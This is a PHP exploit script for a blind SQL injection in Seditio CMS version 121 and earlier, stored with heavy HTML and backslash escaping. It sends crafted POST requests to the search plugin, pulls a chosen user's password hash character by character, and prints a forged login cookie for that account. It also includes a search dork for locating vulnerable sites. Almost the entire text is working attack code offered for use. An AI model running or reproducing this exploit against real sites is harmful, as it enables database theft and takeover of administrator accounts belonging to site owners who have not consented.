Seditio CMS 121 Remote SQL Injection Exploit

<?php ##&nbsp;Seditio&nbsp;CMS&nbsp;<=&nbsp;121&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Exploit ##&nbsp;Software&nbsp;site:&nbsp;http://www.neocrome.net/ ##&nbsp;By&nbsp;InATeam&nbsp;(http://inattack.ru/) ##&nbsp;Requirements:&nbsp;MySQL&nbsp;>=&nbsp;4.1,&nbsp;magic_quotes_gpc=Off echo&nbsp;\\\\\\\"------------------------------------------------------------\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"Seditio&nbsp;CMS&nbsp;<=&nbsp;121&nbsp;Remote&nbsp;SQL&nbsp;Injection&nbsp;Exploit\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"(c)oded&nbsp;by&nbsp;Raz0r,&nbsp;InATeam&nbsp;(http://inattack.ru/)\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"dork:&nbsp;\\\\\\\\\\\\\\\"Powered&nbsp;by&nbsp;Seditio\\\\\\\\\\\\\\\"\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"------------------------------------------------------------\\\\\\\\n\\\\\\\"; if&nbsp;($argc<2)&nbsp;{ echo&nbsp;\\\\\\\"USAGE:\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"~~~~~~\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"php&nbsp;{$argv[0]}&nbsp;[url]&nbsp;OPTIONS\\\\\\\\n\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"[url]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;target&nbsp;server&nbsp;where&nbsp;Seditio&nbsp;CMS&nbsp;is&nbsp;installed\\\\\\\\n\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"OPTIONS:\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"-p=<prefix>&nbsp;&nbsp;-&nbsp;use&nbsp;specific&nbsp;prefix&nbsp;(default&nbsp;sed_)\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"-id=<id>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;use&nbsp;specific&nbsp;user&nbsp;id&nbsp;(default&nbsp;1)\\\\\\\\n\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"examples:\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"php&nbsp;{$argv[0]}&nbsp;http://site.com/&nbsp;-p=cms_\\\\\\\\n\\\\\\\"; echo&nbsp;\\\\\\\"php&nbsp;{$argv[0]}&nbsp;http://cms.site.com:8080/&nbsp;-id=2\\\\\\\\n\\\\\\\"; die; } error_reporting(0); set_time_limit(0); ini_set(\\\\\\\"max_execution_time\\\\\\\",0); ini_set(\\\\\\\"default_socket_timeout\\\\\\\",10); $url&nbsp;=&nbsp;$argv[1]; for($i=2;$i<$argc;$i++)&nbsp;{ &nbsp;&nbsp;&nbsp;if(strpos($argv[$i],\\\\\\\"=\\\\\\\")!==false)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$exploded=explode(\\\\\\\"=\\\\\\\",$argv[$i]); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($exploded[0]==\\\\\\\'-p\\\\\\\')&nbsp;$prefix&nbsp;=&nbsp;$exploded[1]; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;($exploded[0]==\\\\\\\'-id\\\\\\\')&nbsp;$id&nbsp;=&nbsp;$exploded[1]; &nbsp;&nbsp;&nbsp;} } if&nbsp;(!isset($prefix))&nbsp;$prefix&nbsp;=&nbsp;\\\\\\\"sed_\\\\\\\"; if&nbsp;(!isset($id))&nbsp;$id&nbsp;=&nbsp;1; $url_parts&nbsp;=&nbsp;parse_url($url); $host&nbsp;=&nbsp;$url_parts[\\\\\\\'host\\\\\\\']; if&nbsp;(isset($url_parts[\\\\\\\'port\\\\\\\']))&nbsp;$port&nbsp;=&nbsp;$url_parts[\\\\\\\'port\\\\\\\'];&nbsp;else&nbsp;$port&nbsp;=&nbsp;80; $path&nbsp;=&nbsp;$url_parts[\\\\\\\'path\\\\\\\']; print(\\\\\\\"[~]&nbsp;Connecting...&nbsp;\\\\\\\"); if&nbsp;(!getchar(\\\\\\\"<1\\\\\\\",$i,false))&nbsp;print(\\\\\\\"OK\\\\\\\\n\\\\\\\"); else&nbsp;die(\\\\\\\"\\\\\\\\n[-]&nbsp;Exploit&nbsp;failed\\\\\\\\n\\\\\\\"); print(\\\\\\\"&nbsp;&nbsp;&nbsp;&nbsp;Getting&nbsp;hash...\\\\\\\"); $hash=\\\\\\\'\\\\\\\'; for&nbsp;($i=1;&nbsp;$i<=32;&nbsp;$i++)&nbsp;{ &nbsp;&nbsp;&nbsp;if&nbsp;(!getchar(\\\\\\\">57\\\\\\\",$i))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$min&nbsp;=&nbsp;48; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$max&nbsp;=&nbsp;57;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;else&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$min&nbsp;=&nbsp;97; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$max&nbsp;=&nbsp;102;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;for($j=$min;$j<=$max;$j++)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(getchar(\\\\\\\"+LIKE+$j\\\\\\\",$i))&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$hash&nbsp;.=&nbsp;chr($j); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;} } print(\\\\\\\"[+]&nbsp;Done!&nbsp;hash&nbsp;-&nbsp;$hash\\\\\\\\n\\\\\\\"); print(\\\\\\\"[+]&nbsp;Cookie&nbsp;to&nbsp;log&nbsp;in:&nbsp;\\\\\\\\nSEDITIO=\\\\\\\".base64_encode($id.\\\\\\\":_:\\\\\\\".$hash.\\\\\\\":_:ice\\\\\\\").\\\\\\\"\\\\\\\\n\\\\\\\"); function&nbsp;getchar($query,$pos,$status=true){ &nbsp;&nbsp;&nbsp;global&nbsp;$host,$path,$prefix,$id; &nbsp;&nbsp;&nbsp;if&nbsp;($status)&nbsp;status(); &nbsp;&nbsp;&nbsp;$data&nbsp;=&nbsp;\\\\\\\"sq=InATeam&frm_sub%5B%5D=9999&sea_frmtitle=1&sea_frmtext=1&sea_pagtitle=1\\\\\\\"; &nbsp;&nbsp;&nbsp;$data.=&nbsp;\\\\\\\"&sea_pagdesc=1&sea_pagtext=1&searchin_pag=1&pag_sub%5B%5D=qwerty\\\\\\\')\\\\\\\"; &nbsp;&nbsp;&nbsp;$data.=&nbsp;\\\\\\\"+AND+1=IF(ORD(MID((SELECT+user_password+FROM+{$prefix}users+WHERE\\\\\\\"; &nbsp;&nbsp;&nbsp;$data.=&nbsp;\\\\\\\"+user_id={$id}),{$pos},1)){$query},1,(SELECT+1+UNION+SELECT+5))/*&x=GUEST\\\\\\\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$packet&nbsp;&nbsp;=&nbsp;\\\\\\\"POST&nbsp;{$path}plug.php?e=search&a=search&nbsp;HTTP/1.1\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"Host:&nbsp;{$host}\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"Referer:&nbsp;http://{$host}{$path}plug.php?e=search&a=search\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"User-Agent:&nbsp;InAttack&nbsp;User&nbsp;Agent\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"Content-Type:&nbsp;application/x-www-form-urlencoded\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"Content-Length:&nbsp;\\\\\\\".strlen($data).\\\\\\\"\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;\\\\\\\"Connection:&nbsp;Close\\\\\\\\r\\\\\\\\n\\\\\\\\r\\\\\\\\n\\\\\\\"; &nbsp;&nbsp;&nbsp;$packet&nbsp;.=&nbsp;$data; &nbsp;&nbsp;&nbsp;return&nbsp;(strpos(send($packet),\\\\\\\'Subquery&nbsp;returns&nbsp;more&nbsp;than&nbsp;1&nbsp;row\\\\\\\')===false)&nbsp;?&nbsp;true&nbsp;:&nbsp;false; } function&nbsp;send($packet)&nbsp;{ &nbsp;&nbsp;&nbsp;global&nbsp;$host,$port; &nbsp;&nbsp;&nbsp;$ock&nbsp;=&nbsp;fsockopen(gethostbyname($host),$port); &nbsp;&nbsp;&nbsp;if&nbsp;($ock)&nbsp;{ &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;fputs($ock,&nbsp;$packet); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$html=\\\\\\\'\\\\\\\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;while&nbsp;(!feof($ock))&nbsp;$html.=fgets($ock); &nbsp;&nbsp;&nbsp;} &nbsp;&nbsp;&nbsp;else&nbsp;die(\\\\\\\"[-]&nbsp;Exploit&nbsp;failed\\\\\\\\n\\\\\\\"); &nbsp;&nbsp;&nbsp;return&nbsp;$html; } function&nbsp;status()&nbsp;{ &nbsp;&nbsp;&nbsp;static&nbsp;$n; &nbsp;&nbsp;&nbsp;$n++; &nbsp;&nbsp;&nbsp;if&nbsp;($n&nbsp;>&nbsp;3)&nbsp;$n&nbsp;=&nbsp;0; &nbsp;&nbsp;&nbsp;if($n==0){&nbsp;print&nbsp;\\\\\\\"\\\\\\\\r[-]\\\\\\\\r\\\\\\\";&nbsp;} &nbsp;&nbsp;&nbsp;if($n==1){&nbsp;print&nbsp;\\\\\\\"\\\\\\\\r[\\\\\\\\\\\\\\\\]\\\\\\\\r\\\\\\\";} &nbsp;&nbsp;&nbsp;if($n==2){&nbsp;print&nbsp;\\\\\\\"\\\\\\\\r[|]\\\\\\\\r\\\\\\\";&nbsp;} &nbsp;&nbsp;&nbsp;if($n==3){&nbsp;print&nbsp;\\\\\\\"\\\\\\\\r[/]\\\\\\\\r\\\\\\\";&nbsp;} } ?>